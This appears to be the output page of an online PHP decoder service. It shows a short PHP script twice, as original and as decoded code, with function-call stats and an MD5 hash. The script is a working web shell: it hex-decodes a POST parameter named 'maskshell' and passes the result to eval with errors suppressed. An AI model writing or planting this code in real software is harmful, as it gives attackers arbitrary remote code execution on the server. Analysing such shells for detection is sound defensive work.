Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
16 <?php $string=''; $hex=$_POST['maskshell']; for($i=0;$i<strlen($hex)-1;$i+=2){ $string..
Decoded Output download
16
<?php
$string='';
$hex=$_POST['maskshell'];
for($i=0;$i<strlen($hex)-1;$i+=2){
$string.=chr(hexdec($hex[$i].$hex[$i+1]));
}
@eval($string);
?>
Did this file decode correctly?
Original Code
16
<?php
$string='';
$hex=$_POST['maskshell'];
for($i=0;$i<strlen($hex)-1;$i+=2){
$string.=chr(hexdec($hex[$i].$hex[$i+1]));
}
@eval($string);
?>
Function Calls
| strlen | 1 |
Stats
| MD5 | 41d1ff36cc3d126676c6b6fc6d0b3488 |
| Eval Count | 1 |
| Decode Time | 102 ms |